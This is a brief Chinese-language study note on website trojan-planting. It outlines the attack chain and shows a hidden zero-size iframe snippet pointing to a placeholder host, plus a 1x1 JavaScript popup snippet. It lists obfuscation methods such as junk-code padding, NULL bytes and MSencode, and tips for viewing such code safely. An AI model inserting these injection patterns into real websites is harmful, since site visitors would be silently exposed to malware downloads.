网站挂马是指:黑客通过入侵或者其他方式控制了网站的权限,在网站的web页面中插入网马,用户在访问被挂马的网站时也会访问黑客构造的网马,网马再被用户浏览器访问是就会利用浏览器或者相关插件的漏洞,下载并执行恶意软件。
挂马流程:
制作木马------木马免杀------制作网页木马------入侵网站------植入网页木马-----网页浏览者遭受攻击
框架挂马
<iframe src=http://www.xxx.com/width=0 height=0></iframe>
在网页创建一个表面上看不见的框架,在框架中访问http://----------------/页面
JS挂马
<script language=javascript>
window.open("http://www.bing.com","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");
</script>
将此代码直接插入到网页中
网站挂马的实行需要进行条件判断
1 判断浏览器、操作系统版本
2 判断组件控件是否存在
3 判断资源是否存在
所有的网马加密方式,在客户端都必须被识别
所有网马的加密方式都是可以解密的
document.write(....................)
有很大可能是网马
将document.write改为alert就安全了,只显示,不执行
<textarea>也可以防止网马执行 只显示,不执行
eval 、 execute和document.write作用一样
网马加密方式:
1 加花
2 NULL 空字符对浏览器解析没有任何影响 空字符不等于空格 十六进制的空为00
3 Msencode